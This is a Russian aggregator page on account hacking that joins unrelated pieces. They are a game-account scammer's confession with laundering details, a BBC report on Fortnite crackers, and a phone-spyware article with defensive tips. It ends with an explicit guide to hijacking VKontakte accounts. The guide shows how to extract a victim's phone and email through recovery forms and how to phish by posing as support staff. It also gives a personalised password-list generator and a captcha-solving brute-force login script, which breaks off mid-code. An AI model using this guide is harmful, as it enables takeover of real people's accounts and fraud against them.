Взлом аккаунтов закон

«В какой-то момент я получал около 20-30 тысяч рублей в сутки» — Офтоп на vc.ru

Взлом аккаунтов закон

Моя история началась в 2012 году. Тогда как раз начался бум с игрой Minecraft и на волне всей этой шумихи я решил на своем полумертвом компьютере открыть сервер для таких же друзей-школьников.

Со временем через знакомых я познакомился с группой других ребят: они делали коммерческие сервера с донатом и получали с этого неплохие деньги.

В тот момент в моей юной голове что-то щелкнуло и возникла мысль: «Если у них получается, то почему я не могу?».

Первый блин вышел комом, и с серверами у меня не получилось. Зато я нащупал спрос немного в другой области.

В то время все скачивали пиратскую версию Minecraft и играли на пиратских серверах, которые постоянно глючили.

Чтобы играть на хороших западных серверах, нужно было купить лицензионную версию, заплатив разработчикам почти 1000 рублей. Разумеется, многие школьники не хотели расставаться с деньгами.

Прочесывая западные форумы, я обнаружил, что за $2-4 доллара можно найти взломанные аккаунты. Я купил пару штук и продал их на форумах с накруткой в 40%. Целую неделю я занимался тем, что искал и продавал аккаунты, и в итоге решил автоматизировать процесс: нашел простенькую площадку, сделал магазин.

Навыков в рекламе у меня тогда не было, поэтому я просто разослал ссылку по форумам, и удивительно, как быстро все пошло. Доход выходил в районе 20-40 тысяч рублей в месяц, что мне, 14-летнему школьнику, казалось очень большой суммой.

Однако возникла другая проблема: спрос превысил предложение, и количество желающих купить взломанные аккаунты было заметно больше, чем количество аккаунтов, которые я мог достать. К слову, многие поняли, что это золотая жила, и количество подобных магазинов начало расти по экспоненте.

Под конец 2013 года спрос начал постепенно падать. Я думал, чем еще можно заняться, и для пробы решил добавить взломанные аккаунты из других игр, которые мне удавалось найти.

Их покупали не ради доступа к лицензионным серверам, а ради редких вещей или более прокачанных персонажей — это зависело от игры.

Однако была проблема: я продавал их с небольшой накруткой, поэтому большая часть доходов уходила на покупку новых аккаунтов.

В тот момент я познакомился с парнями, у которых были свои магазины. Мы разговорились, и они удивились, что я не продаю «пустышки» — то есть аккаунты без обещанных вещей. «А смысл продавать рабочие, покупатели всегда будут недовольны, да и суммы небольшие», — аргументировали они.

И в тот момент я задумался: а ведь правда, зачем продавать рабочие, если покупатели в 50% случаев остаются недовольны, потому что спустя непродолжительное время даже прокачанные аккаунты перестают работать.

Меня, конечно, мучили сомнения, но в конце концов, я решил попробовать. Я оправдывал себя тем, что обманываю людей на небольшие суммы — в среднем аккаунт стоил в районе 99-299 рублей.

Далее я добавил в магазин самые «топовые» аккаунты, сделал видимость хорошей репутации, заказал рекламу в роликах на (в тот момент в СНГ только начали появляться различные обзорщики игр и стримеры).

Мой доход начал расти. Три тысячи, четыре тысячи, пять тысяч в день — я понимал, что вот так вот обманывать народ и оставаться безнаказанным нельзя. Кроме того, по своей глупости я оставил в магазине свои данные: когда он оставался «серым» — это было безопасно. Когда он стал «черным», я их удалил, но они все равно остались в кэше. И мне стали поступать угрозы от обманутых людей.

Деньги шли в основном через Webmoney и Qiwi. Сейчас я понимаю, что был глуп и бесстрашен: шел в банк и напрямую их обналичивал. Конечно, работники со временем стали удивляться, как в свои 15 школьник может еженедельно снимать по 20-30 тысяч?

Свои доходы я старался скрывать от родителей и знакомых. Мне было стыдно признаться им, что я обманываю людей.

Однако в определенный момент мне нужно было пройти идентификацию Webmoney, а из-за того, что я был несовершеннолетним, мне нужна была подпись родителей.

Пришлось обмануть и их: я сделал и открыл несуществующий «белый» проект для прикрытия, чтобы в дальнейшем оправдывать высокие заработки.

К середине 2014 года я достиг потолка прибыли на этом магазине. Я понимал, что четыре-пять тысяч рублей в день — это не предел, и нужно двигаться дальше. Как раз в то время у игроков возник спрос на инвентарь для Counter-Strike: Global Offensive — оружие с редкими текстурами, кейсы, наклейки и так далее.

Работать нужно было срочно, пока не появились конкуренты. Я действовал по старинке: сделал магазин на новой платформе, заказал много рекламы и дело пошло.

Но когда прибыль от нового магазина превысила пять тысяч рублей в сутки, начались первые серьезные проблемы: блокировка кошельков и постоянные DDoS-атаки.

В течение месяца я спал по два-три часа, перестал ходить в школу и сутками решал проблемы.

Спустя время мне удалось справиться со всем, более-менее автоматизировать систему и даже нанять двух знакомых, чтобы один отвечал за работу сервиса, а второй — за поиск площадок, где можно купить рекламу.

В тот момент я получал около 10 тысяч в день. Когда был трезвый (если в 16 лет получаешь такие суммы, сложно не связаться с какой-нибудь дурацкой компанией), то понимал, что это не шутки и нужно хоть как-то конспирироваться, пока меня не повязали. И вообще, по-хорошему, нужно переходить в «белые» проекты.

Конкурентов становилось все больше и постепенно прибыль опять начала проседать. Когда я поехал в небольшой тур по Европе, то познакомился с одним из модераторов сервиса по обналичиванию денег Dark Money, а через него — с другой компанией, которая проворачивала дела намного крупнее моих.

Они занимались аферами, связанными с онлайн-магазинами техники, и их месячный доход был от одного до четырех миллионов рублей.

Мне стало жутко от того, в какую компанию я попал, ведь одно дело обманывать на суммы не превышающую 300 рублей (пускай и большое количество людей), а другое — на суммы от 10 тысяч.

Они хотели, чтобы я присоединился к их «скромной» компании, но я вежливо отказал, ведь надо было знать меру. И правильно сделал — в августе 2015 года всю эту компанию повязали.

К счастью, общение с ними сыграло только на «пользу»: я понял, что постоянная покупка рекламы — это не очень продуктивно, и нужно для каждой игры делать отдельный тематический магазин и поднимать его в поиске. В тот момент я вообще ничего не знал про SEO и 90% трафика составляла как раз реклама.

В итоге я взял шаблон рабочего магазина, немного изменил его для каждой игры и открыл сперва пять магазинов. Также нашел SEO-специалистов, которые были готовы продвигать его за определенную сумму.

Спустя 2 месяца они стали подниматься вверх по ключевым запросам. К слову, половина моих знакомых до сих пор занимается такими вещами и их сайты занимают лидирующие позиции по определенным запросам.

Дополнительно к более-менее стабильным восьми-десяти тысячам рублей в день с основного магазина, мне начали капать по две-четыре тысячи в день с тех магазинов.

И для меня это было отдельной радостью: не нужно платить крупные суммы за рекламу, достаточно платить специалистам, чтобы те следили за позицией ресурсов в поиске.

Но все равно, некоторым своим знакомым мне приходилось платить за молчание.

Но здесь начались проблемы с блокировкой кошельков, и я платил до 20% прибыли людям, которые следили за их состоянием, обналичивали деньги и меняли их по два-три раза в день. Постепенно у меня появилась целая «империя» из сети подобных магазинов, все их платежи я подключил через систему приема платежей WayToPay.

Думаю, их прикрыли благодаря мне, потому что моя сеть составляла немалую часть их дохода, и к ним постоянно подключалось еще больше таких же кидал. Благодаря системе я мог не платить 20% прибыли за смену кошельков, а лишь 3-10% за комиссию с агрегатора. Тогда я уже поумнел и талантливо отмывал деньги: для окружающих они выглядели относительно белыми.

«Империя» росла и чистый доход в какой-то момент достиг около 20-30 тысяч в сутки. Это была осень 2015 года, мне становилось все сложнее отмывать деньги, органы все сильнее интересовались интернетом. Постепенно на этом фоне у меня начались бессонницы, ведь для всех окружающих я был белым и честным, и никто и не подозревал, что я занимаюсь темными делами.

Мне снились сны, что меня вяжут, у меня была паранойя и казалось, что дома установили жучки, что сейчас вломится СОБР и начнет обыск. Дальше так продолжаться не могло, но к большим деньгам я слишком быстро привык и не хотел отказываться, поэтому попросту тянул время и инвестировал в белые проекты, чтобы рано или поздно заняться ими вплотную. Но это у меня не очень получалось.

В начале 2016 года, я узнал, что на одного знакомого вышел отдел «К» и прикрыл им лавочку. И это было странно, потому что он не светил данные в сети и они не могли на него выйти. А на меня — запросто: достаточно было зайти в веб-архив, найти старый магазин и скопировать номера кошельков, зарегистрированных на меня.

Я должен был срочно принимать решение: либо рискую дальше и живу в страхе, либо закрываю все и постепенно трачу скопленную сумму или делаю что-то свое. Я принял второе решение: свобода важнее. Хотя половина моих знакомых продолжила заниматься такими вещами, и на удивление, органам в данный момент все равно. Видимо это из-за небольших сумм (которые впоследствии складываются в большую).

Пусть у меня нет прежних доходов, но я стал лучше спать и на душе стало спокойнее. С моим уходом появились новые сетки. Вы не представляете, какой этот серый рынок обширный. Люди, которые осели в определенных областях (ключи, инвентарь и аккаунты к играм — только одна из них) занимаются этим по два-четыре года. Некоторые даже не пытаются конспирироваться, и выйти на них не составляет труда.

Но, как я уже говорил — органы закрывают глаза, потому что они обманывают людей на небольшие суммы (до тысячи рублей), а из-за бюрократии им будет тяжело все суммировать и подтверждать каждый платеж, чтобы получить хотя бы часть суммы от доходов таких проектов за месяц.

Покупатели, которых кидают, создают целые сообщества, пишут петиции, а магазины все равно существуют. В области аккаунтов и игр как минимум 50% владельцев магазинов — несовершеннолетние. И не тяжело удивиться, какой образ жизни они начинают вести, если их месячный доход превышает 200 тысяч рублей.

Источник: https://vc.ru/flood/20621-broken-keys

Хакеры-подростки зарабатывают на взломах в игре Fortnite тысячи долларов в неделю – BBC News Русская служба

Взлом аккаунтов закон

Более 200 млн игроков ежедневно заходят на портал игры Fortnite

сенсация последнего года в мире компьютерных игр – это онлайн-игра Fortnite, в которую играют десятки миллионов людей по всему миру.

Проблема в том, что эта игра напрямую связана с глобальной сетью хакеров, которая использует ее в качестве приманки. Входящие в сеть юные взломщики, многим из которых нет и 15 лет, зарабатывают на этом тысячи долларов в неделю.

Би-би-си поговорила с подростками-хакерами из разных стран, которые рассказали о том, как они похищают и перепродают личные аккаунты других игроков.

Хотя играть в Fortnite можно бесплатно, вокруг нее возник огромный рынок объемом около 1,3 млрд долларов, на котором торгуют различными игровыми аксессуарами, в том числе персонажами из игры (так называемыми скинами).

Эти виртуальные аксессуары можно коллекционировать по ходу игры, и они не приносят игроку каких-либо преимуществ, выполняя сугубо декоративную функцию. Обладание ими ценится среди игроков как признак статуса.

Это создало и поддерживает растущий черный рынок, на котором хакеры торгуют взломанными аккаунтами, цены на которые могут колебаться от 25 центов до сотен долларов в зависимости от того, что они содержат.

Фирма Epic, которая создала игру Fortnite, отказалась от комментариев по поводу расследования, однако пообещала улучшить меры по сохранности личной информации игроков.

Этот 14-летний “крэкер” положил в карман более 1800 долларов за несколько недель

Один британский хакер рассказал нам, что втянулся в этот бизнес, когда ему было 14 лет, то есть за несколько месяцев до нашего разговора. Тогда он сам стал жертвой взлома.

Он говорил с нами по видеочату из своей спальни. На нем была бейсбольная кепка, а лицо скрыто платком.

По его словам, он много и успешно играл и собрал целую коллекцию скинов, на которую потратил 60 долларов.

Но однажды он получил электронное письмо, которое все изменило.

“В письме говорилось, что мой пароль изменен, и что теперь моему аккаунту требуется двухфакторная аутентификация. Чтобы его разблокировать, от меня потребовали пройти процедуру двухфакторной аутентификации. Ощущения были ужасные”, – рассказывает подросток.

Двухфакторная аутентификация – это метод подтверждения личности игрока с помощью добавления двух или более элементов к обычному механизму авторизации с логином и паролем. Например, после ввода пароля система просит также ввести одноразовый код, который в этот момент приходит на мобильный телефон пользователя в СМС. Преодолеть такой барьер как правило исключительно трудно.

На форумах Fortnite можно приобрести различные аксессуары и скины, позволяющие игроку подчеркнуть свою индивидуальность

Подобно многим другим жертвам, 14-летний игрок вылил свои оскорбленные чувства в “Твиттере”, но именно там он быстро обнаружил предложения купить новые аккаунты, содержащие еще более завидные аксессуары.

“Со мной связался кто-то, кто предложил купить аккаунт за 25 центов. Я сразу понял, что этот аккаунт стоит дороже, и купил его”, – рассказывает юный хакер.

Это стало его первой встречей с миром хакеров или “крэкеров”, как они сами себя называют, игры Fortnite. Он знал, что отныне играет с похищенного кем-то аккаунта, но вокруг него было множество других игроков, которые вели себя так же и зарабатывали на этом кучу денег.

Вскоре он полностью погрузился в этот удивительный мир взломщиков Fortnite.

“Со мной связалась группа крэкеров. Они показали мне, где можно найти инструменты для взлома аккаунтов”, – рассказывает он.

По его словам, они дали ему ссылки в сети, где были выложены обширные списки имен и паролей, добытых путем взлома счетов за многие годы. Они также показали ему, где и как можно по дешевке приобрести уже готовые инструменты, необходимые для регистрации чужого профайла на сервере игры Fortnite.

И, наконец, они научили его взламывать учетные записи других игроков и продавать их на форумах поклонников игры.

Жертвы хакеров изливают свои горести в социальных сетях

Наш хакер утверждает, что был крэкером лишь один день. За это время ему удалось получить доступ более чем к тысяче учетных записей игры Fortnite.

По его словам, он быстро понял, что куда выгоднее быть посредником между крэкерами и покупателями, то есть продавать аккаунты, вскрытые кем-то другим.

За первые несколько недель он заработал около 1800 долларов и купил себе несколько игр и велосипед.

Он осознает, что его деятельность противозаконна, и говорит, что его родители в курсе того, чем он занимается.

На форумах игры нетрудно встретить предложения о приобретении взломанных аккаунтов – на них натыкаешься повсеместно

Взлом игровых и других аккаунтов уже давно стал работой и хобби для множества хакеров. Особо привлекают их учетные записи в социальных сетях или платные подписки на различные онлайн-сервисы – такие, например, как музыкальная платформа Spotify.

Число игроков в Fortnite, вышедшей в 2017 году, уже превышает 200 миллионов по всему миру. Революционным выглядит не только рост популярности игры, но и размах нелегальной торговли виртуальными благами из нее.

Сотни хакеров и посредников открыто торгуют личной информацией в сервисе микроблоков и мессенджере Discord.

Они совершают уголовное преступление, нарушая американский закон о злонамеренном использовании компьютера. В случае поимки им грозит лишение свободы сроком до двух лет.

Этот активный 17-летний хакер, одетый в дорогостоящий скин с сияющими синими глазами и крыльями, согласился поговорить с Би-би-си только через чат игры

Некоторые из них не проявляют никаких признаков раскаяния или даже беспокойства по поводу возможного разоблачения.

Один из наиболее активных крекеров – 17-летний юноша из Словении, который торгует крадеными профайлами на собственном сайте и даже платит друзьям за то, чтобы они вели за него его собственные аккаунты в соцсетях.

“Поймать нас невозможно, этим никто не занимается”, – рассказал он Би-би-си в ходе виртуальной встречи внутри игры, где он продемонстрировал свои навыки.

Не отводя глаз от экрана, где шла ожесточенная перестрелка, он рассказал мне, что заработал крэкингом больше 20 тысяч долларов за семь месяцев.

Его мать, работающая бухгалтером, помогает ему с управлением финансами. Он копит на свой первый автомобиль.

Он даже прислал нам скриншоты своих счетов в платежной системе PayPal и криптовалютных кошельках, чтобы доказать нам реальность своих заработков в сети.

Другой хакер показал нам подтверждение того, что он зарабатывал на этом от 60 до 400 долларов в день.

15-летний крэкер из Франции рассказал, что однажды за неделю он заработал 2900 долларов, и признался, что теперь использует полученные навыки взлома для более серьезных киберпреступлений.

“Да, я проделывал разные штуки, но ничего особо выдающегося. Взламывал кое-какие вещи да мошенничал с персональными данными”, – сказал он.

Тенденция перехода игровых мошенников к более серьезным правонарушениям в особенности тревожит британские спецслужбы.

В отделе киберпреступлений Национального управления по борьбе с преступностью нам рассказали об уже давно замеченной связи между компьютерными играми и хакерством.

Может ли отрасль видеоигр защитить своих клиентов от хакеров?

“Мы хотели бы, чтобы компании, которые разрабатывают и поддерживают такие игры, относились к этой проблеме не как к чисто технической: им необходимо вступать в прямой контакт с этой узкой, но весьма квалифицированной группой хакеров, которые в основном и совершают преступления”, – говорит Этан Томас, заядлый геймер и специалист по кибербезопасности, самый молодой сотрудник управления.

“Мы хотели бы, чтобы индустрия компьютерных игр теснее сотрудничала с правоохранительными органами. Таким фирмам следует уделить внимание предупредительным мерами на самом раннем этапе, направляя игроков в сторону более этичного и законопослушного поведения”, – замечает Томас.

Дебби Тернстолл, которая ведет специальные курсы по реабилитации для разоблаченных хакеров, рассказывает, что ее особо тревожит существование сообщества крэкеров, появившееся вокруг Fortnite.

По ее словам, это сообщество служит рассадником киберпреступности.

“Нам известно, что с этим связана организованная преступность, и мы знаем, что молодых хакеров подстегивают куда более опасные люди, остающиеся за кулисами. Их явно натаскивают на совершение киберпреступлений, и если мы не примем мер, они запросто могут пойти по этому пути”, – говорит Дебби.

Двухфакторная аутентификация на данный момент – самое надежное средство защиты от хакеров

Вопрос о взломе аккаунтов Fortnite был впервые поставлен перед разработчиками игры в марте. Фирма Epic заявила, что занимается этой проблемой.

Компания призвала игроков, которые считают, что их аккаунт взломали, немедленно обращаться в службу поддержки.

С тех пор Fortnite набрала еще большую популярность. В настоящее время в игре наступил уже седьмой сезон.

По словам хакеров, двухфакторная аутентификация входа в систему – например, привязка пароля к номеру мобильного телефона или связь приложения с адресом электронной почты – чрезвычайно осложняет взлом аккаунта.

Фирма Epic в настоящее время не обязывает пользователей включать режим двухфакторной аутентификации, однако ввела особую систему бонусов для тех игроков, которые используют ее добровольно.

Источник: https://www.bbc.com/russian/features-46640349

3 способа, которыми злоумышленник может взломать телефон без ведома жертв

Взлом аккаунтов закон

3 способа, которыми злоумышленник может взломать телефон без ведома жертв

Мы везде носим с собой наши мобильные телефоны, которые хранят личную информацию своих владельцев. Если эти данные попадут в чужие руки, это может иметь катастрофические последствия для нас.

Хакеры и мошенники, как известно, используют фишинг для кражи личной информации.

Они могут использовать эти данные, включая имена пользователей, пароли, номера социального страхования, PIN-коды и информацию о банковском счете, для кражи личных данных, кражи денег, шантажа, мошенничества и т. д.

Злоумышленники придумали уникальные способы мониторинга мобильных телефонов. Часто они используют уязвимости в операционной системе телефона, чтобы взломать его.

Тем не менее, весьма часто они используют социальную инженерию, чтобы обмануть ничего не подозревающих людей при загрузке вредоносного программного обеспечения на свои мобильные телефоны.

Вот три популярных способа взломать ваш телефон без вашего ведома:

  1. Через тексты. Взлом мобильного телефона через SMS / текст является популярным методом, используемым хакерами и мошенниками. Источник SMS может быть законным или известным. Может показаться, что сообщение отправлено банком, государственным учреждением или кем-либо из ваших знакомых и содержит ссылку на веб-сайт, который загружает вредоносное программное обеспечение на устройство. Формулировка SMS может обмануть пользователя устройства, открыв ссылку в сообщении. URL-адрес побуждает пользователя загрузить троянский конь или другое вредоносное программное обеспечение. Следовательно, хакер может получить доступ к данным на устройстве. В некоторых случаях ваш телефон может быть взломан, даже если вы не откроете сообщение. В статье Wired была описана ошибка в iPhone, с помощью которой можно взломать, даже не открыв сообщение. Эти ошибки «без взаимодействия» могут отправлять пользовательские данные без необходимости взаимодействия с пользователем. В других случаях отправитель может попросить вас отменить услугу или предоставить пароль. SMS также может содержать номер телефона, по которому вы можете перезвонить. В этом случае мошенники очень интеллектуально просматривают информацию о вашей кредитной карте. Этот метод также известен как SMS-фишинг или мошенничество. Smishing работает так же, как фишинг электронной почты.
  2. Через общедоступный Wi-Fi. Общественные сети Wi-Fi часто не защищены. Их можно использовать для взлома телефона, мониторинга ваших данных и проведения атак на ваше устройство. Когда вы подключаетесь к Wi-Fi, маршрутизатор записывает MAC-адрес и IP-адрес вашего мобильного телефона. В сети Wi-Fi данные передаются с использованием пакетов данных. Хакер может использовать общедоступный Wi-Fi для выполнения следующих действий:
    1. Атака «человек посередине»: хакер вставляет себя между сервером и клиентом, разрывает связь между клиентом и сервером и отслеживает взаимодействие.
    1. Обнаружение пакетов: хакерское программное обеспечение, отслеживает пакеты данных, передаваемых между мобильным устройством и сервером. Таким образом, если вы вводите имена пользователей и пароли при подключении к общедоступной сети Wi-Fi, хакер может просмотреть ее.
  3. С помощью программы-шпиона для мобильного телефона. Популярная шпионская программа Xnspy используется для кражи информации с мобильных телефонов и планшетов. Можно установить приложение на телефон iPhone или Android и осуществлять удаленный мониторинг телефона. Несмотря на то, что приложение предназначено для родительского и сотруднического мониторинга, хакер может установить приложение, чтобы шпионить за вашим телефоном. Приложение отслеживает активность и записывает данные и загружает их на частный сервер.

Что может контролировать хакер?

Журнал звонков, список контактов и текстовые сообщения.

Приложение регистрирует все входящие, исходящие и пропущенные звонки с указанием времени и даты каждого звонка. В дополнение к этому, приложение следит за списком контактов на устройстве.

Кроме того, приложение отслеживает сообщения, отправляемые с помощью текстовых сообщений и приложений для обмена мгновенными сообщениями, таких как Messenger, Instagram Direct Messages, Skype, WhatsApp и других. Приложение также записывает данные отправителя и получателя каждого текстового сообщения.

Так что, если на устройстве оно установлено, злоумышленник может отслеживать, с кем вы разговариваете, используя ваш телефон.

Xnspy также предлагает кейлоггер — функцию, которая отслеживает нажатия клавиш на устройстве. Преступник может использовать его для мониторинга паролей и имен пользователей.

Кроме того, Xnspy отслеживает мультимедийные файлы на ваших мобильных телефонах. Приложение загружает фотографии и видео, сохраненные на вашем устройстве, на сервер Xnspy. Можно просмотреть эти файлы в учетной записи Xnspy. Кроме того, можно также загрузить эти файлы для просмотра в более позднее время.

Интернет активность. Шпионское приложение, такое как Xnspy, может отслеживать электронную почту, историю браузера и веб-страницы, добавленные в закладки. Приложение записывает содержимое электронной почты, в том числе сведения об отправителе и получателе. Когда дело доходит до истории браузера, приложение отслеживает URL-адрес веб-страницы и частоту посещений веб-сайта.

Отслеживание местоположения. Xnspy записывает предыдущее местоположение и предоставляет актуальное местоположение мобильного телефона.

Таким образом, сталкер может контролировать, где вы были в течение дня. В дополнение к этому, функция геозоны позволяет разработчикам устанавливать виртуальные границы.

Если пользователь устройства вводит или покидает эти границы, приложение отправляет уведомление учетной записи.

Приложение также записывает сети Wi-Fi.Запись телефонных разговоров и прослушивание среды. Хакер может записывать телефонные звонки, отправляя команды из учетной записи Xnspy.

Более того, он может использовать приложение для прослушивания окружения телефона, когда он находится в режиме ожидания. Приложение загружает аудиофайлы в учетную запись Xnspy, с помощью которой хакер может загружать и прослушивать целые разговоры.

Дистанционное управление. Злоумышленник может управлять устройством с ноутбука или компьютера, используя учетную запись Xnspy. Удаленные функции приложения позволяют хакеру стереть данные, заблокировать телефон и просмотреть активность приложения. Хакер также может отправлять удаленные команды, чтобы сделать снимки экрана мобильного телефона.

Следовательно, злоумышленник всегда знает о ваших действиях. Как можно установить его на свой телефон? Приложение совместимо с новейшими операционными системами iOS и Android, хакер может загрузить его как на телефоны, так и на планшеты. Чтобы скачать приложение, хакер может отправить ссылку по электронной почте.

Если хакер имеет доступ к паролю вашего устройства, он может легко установить приложение на телефон Android. Однако для установки приложения на iPhone хакеру требуются только учетные данные iCloud (Apple ID и пароль).

С приложением, установленным на телефоне, хакер может получить доступ к вашему мобильному телефону и записывать данные удаленно.

Убедитесь, что у вас 2fa активирован на вашем iPhone.

Как удалить приложение?

Чтобы определить, установлено ли на вашем телефоне какое-либо шпионское приложение, такое как Xnspy, вы можете заметить следующие признаки: Аккумулятор устройства быстро разряжается. Использование данных устройства является высоким.

Некоторые приложения на телефоне больше не открываются. Устройство блокируется само по себе. Поскольку приложение работает в скрытом режиме, возможно, вы не сможете просмотреть приложение в списке приложений на устройстве.

Таким образом, чтобы удалить приложение, вы должны сбросить настройки телефона.

Советы, которые помогут вам предотвратить взлом телефона

Вот несколько советов, которые вы можете использовать для предотвращения взлома телефона:

  • Не делитесь паролями со всеми.
  • Не используйте одинаковые пароли для всех устройств и учетных записей.
  • Не открывайте ссылки, отправленные в текстовых сообщениях и электронных письмах, без проверки источника.
  • Установите антивирусное программное обеспечение на свой телефон.
  • Проверьте приложения, установленные на вашем телефоне, и удалите те, которые вы считаете подозрительными.
  • Убедитесь, что у вас есть 2fa для iCloud и онлайн-аккаунтов.
  • Регулярно обновляйте приложения и ОС вашего телефона.
  • Не подключайте телефон к общедоступной учетной записи Wi-Fi без использования VPN.
  • Используйте VPN для подключения телефона к общедоступной сети Wi-Fi.

Вывод

Хакеры нашли гениальные способы удаленного мониторинга устройств. Более того, такие приложения, как Xnspy, позволяют хакеру отслеживать всю активность на устройстве. Они могут использовать личную информацию или мошенничества и мошенничества. Следовательно, вы должны убедиться, что ваше устройство защищено от хакеров.

Источник: https://www.securitylab.ru/blog/personal/bezmaly/347314.php

Пошаговое руководство по взлому страницы ВКонтакте

Взлом аккаунтов закон

В статье приводится несколько возможных способов взлома ВКонтакте, ориентированных на людей, недалёких в компьютерной безопасности.

Иными словами, при взломе будут использоваться не машинные, а человеческие уязвимости. Естественно, приведённые методы не универсальны (и слава богу!), и у кого-то может хватить мозгов на то, чтобы не поддаваться на ваши провокации.

Но таких не так уж много, поверьте. Итак, начнём. Прежде всего, перед началом вам понадобятся страница, которую вы собираетесь “хакнуть”, свободное время и безопасный доступ к ВКонтакте. Сам процесс взлома разделим на несколько шагов.

Прежде всего, нужно собрать как можно информации со страницы потенциальной жертвы, а именно:

    1. URL страницы.
      Сохраняем себе ID или, если там имеется буквенная замена, то ее. Аккаунты и другую нужную нам информацию, всякого рода твиттеры и тому подобное.
    2. Неплохо было бы заиметь почту цели.
      Если человек не только попал в сеть, вы сможете найти почту путем простого гугления. К примеру, особо удобно отыскивать почту на mail.ru. Также можно попробовать поискать Ф.И.О. цели и дату рождения. Или же другого рода такие комбинации. Если жертва имеет Мой Мир на mail, то почта будет в коде страницы или же в URL.

      В том случае, когда имеется почта без соц.сети от mail'a, почту можно выяснить, создав себе подставную почту на этом сервисе и поискав в мессенджере от мэйла. Как ещё один из способов, можно попробовать найти что-нибудь дельное с помощью аккаунтов цели в других социальных сетях.

      Например, попытаться пробить никнеймы из всех найденных аккаунтов по всем известным почтовым сервисам. Как вариант, можно попробовать использовать импорт почтовых контактов и предложение добавить этих людей в друзья. Регистрируем очередную фальшивую почту и получаем дополнительные аккаунты.

      Как альтернатива, можно попытать счастье, используя форму восстановления в 'е, таким образом узнав часть почты. В 'е можно напрямую поискать аккаунт, введя почту в поиск.

    3. Телефон.
      Так, URL и почту узнали, осталось достать номер телефона. Не считая тех случаев, когда номер висит в открытом доступе на странице в соц. сетях или в каких-то проектах (Avito/HeadHunter/Покупка или продажа недвижимости/Свой сайт/Другое), остаётся только один метод. Имеется почта пользователя на mail'е. Вводим ее в форму восстановления в ВКонтакте, и приходит часть номера. А теперь то же самое, но на mail. И если номер там привязан, то вы увидите уже другую, вторую часть номера. Если почта не привязана, то тогда там есть секретный вопрос. Перебираем его и заставляем юзера привязать мобилку на сервис. Отлично, осталась всего пара цифр от почты. Чтобы их узнать, достаточно перебрать форму восстановления ВКонтакте уже с помощью номера. Всего-то 99 раз. Можно и автоматизировать. Также в некоторых случаях люди любят публиковать свой номер на странице, но закрывать часть номера звездочками, черточками и прочей ерундой, что также может упростить процесс взлома. Если повезет, то вам будут видны именно те цифры, которые недоступны в форме восстановления вк.

На данном этапе мы будем пробовать получить доступ к аккаунту цели. Рассмотрим самые простые приёмы:

1) «Социнженер»

Здесь сразу нужно оговориться, что этот способ годиться только для тех, кто мало что знает об интернете, но решил по каким-либо причинам зарегистрироваться в соц.сети. Как правило, это либо старики, либо дети.

Если вы хотите просто попрактиковаться, то новички ВКонтакте могут быть найдены здесь.В данном случае, применяется один из законов психологии: человек, который не разбирается в чем-то, подсознательно доверяет тому, кто более опытен в конкретной области, и принимает его слова на веру.

Тут можно создать аккаунт представителя техподдержки, создать “официальную” почту администрации и прочее. И создать какую-нибудь легенду. Что новые пользователи обязаны проходить проверку после регистрации и дать, например, ссылку на некий тест, по итогу или для входа которого требуется логин-пасс от вк. Самое важное, чтобы вы действовали осторожно.

Следует убедить пользователя, что он в безопасности. Этот приём хорошо сочетается с фейком. Кроме того, продвинутые социнженеры могут, узнав номер юзера, позвонить (анонимно, используя sip) и развести напрямую.

Кроме того, вся указанная вами информация (номер телефона/упоминание фактов с указанием дат/другое) также помогает установить контакт с жертвой и косвенно говорит о том, что вы из техподдержки.

2) «Умный» перебор

Метод, рассчитанный на среднестатистических пользователей. Для него нам надо будет специальный словарь, заточенный под конкретного человека. Давайте разберёмся со структурой нашего словаря:

  • Личные данные. Сюда входят дата рождения (17.11.1992 = 1711, 1992, 17111992), возраст (1992, 2017 = 2017, 1992,  24), имя (Стас = stas, ctac) и фамилия (Иванов = ivanov).
  • Аккаунты из других соц. сетей и почтовые сервисы (.com/stasik_ku , .com/stasss1992, stasss92@mail.ru = stasik_iv, stasss1992, stasss92).
  • Увлечения (футбол, плавание, молодежка = football, swimming, molodejka, molodegka).

Также есть страница вк, на которой написано, какие пароли следует указывать, какие символы возможны и самые частые пароли.Получился лист из 14 строк. Но из него еще нужно создать комбинации паролей, которые могла бы создать наша жертва.

Представляю вам мой небольшой скрипт на python, который этим и занимается.

#! coding:utf-8 import sys,os razdel = ['_',':',';'] def uniq(seq): seen = set() seen_add = seen.add return [x for x in seq if not (x in seen or seen_add(x))] def brute_words(words): new_words = [] for i in words: new_words.append(i) new_words.append(i[0].upper() + i[1:]) new_words.append(i[0].upper() + i[1:-1] + i[-1].upper()) new_words.append(i.upper()) for j in spisok: new_words.append(i + j) for m in razdel: new_words.append(j + m + i) new_words.append(j + i) new_words.append(i * 2 + j) new_words.append(j * 2 + i) new_words.append(i[0].upper() + i[1:] + j) new_words.append(i[0].upper() + i[1:-1] + i[-1].upper() + j) return uniq(new_words) def generate(words_file): o = open(words_file, 'r') words = o.read().splitlines() for i in brute_words(words): print(i) def main(): try: argv1 = sys.argv[1] generate(argv1) except IndexError: print(“Нужно указать файл”) except IOError: print(“Нет такого файла”) if __name__ == “__main__”: main()

Из 14 получилось 1272 варианта. Приведу часть.

Molodegkactac MolodegkActac molodejka_molodegka Stasss92molodejka stasss92molodegka molodegka_stasss92 molodegka:stasss92 molodegka;stasss92 stasss1992swimming swimming_stasss1992 Kurayginctac KuraygiNctac kurayginkuraygin kuraygin_kuraygin molodegka17111992 1711199217111992molodegka molodegkamolodegka17111992 24 1711_24

Отлично, теперь автоматизируем перебор паролей через мобильную версию ВКонтакте небольшим скриптом.

#! coding: utf8 import grab, re, urllib2 from antigate import AntiGate from grab import GrabTimeoutError from time import sleep cap_key = '123 ' #Ваш ключ с Antigate def anti(key, file): #Получение решения Captcha с Antigate try: try: data = AntiGate(key, file) return data except KeyboardInterrupt: print(“Завершение”) except: anti(key, file) def save(url, file): #Скачивание файла по URL site = urllib2.urlopen(url) f = open(file, 'wb') f.write(site.read()) def cap_solve(img): save(img, 'captcha.jpg') key = anti(cap_key, 'captcha.jpg') return key def brute(login, passwords, save): out = open(save, 'w') psswrds = open(passwords,'r') try: int(login) prefix = True except: prefix = False g = grab.Grab() g.go('http://m..com') for line in psswrds: psswrd = line.rstrip('\r') g.doc.set_input('email', login) g.doc.set_input('pass', psswrd) g.doc.submit() if g.doc.text_search(u'captcha'): all_captchas = re.findall('”(/captcha.php[“]*)”', g.response.body)[0] captcha = '' + all_captchas key = cap_solve(captcha) g.doc.set_input('email', login) g.doc.set_input('pass', psswrd) g.doc.set_input('captcha_key', str(key)) g.doc.submit() print(“cap”) if 'Подтвердить' in g.response.body: if prefix: 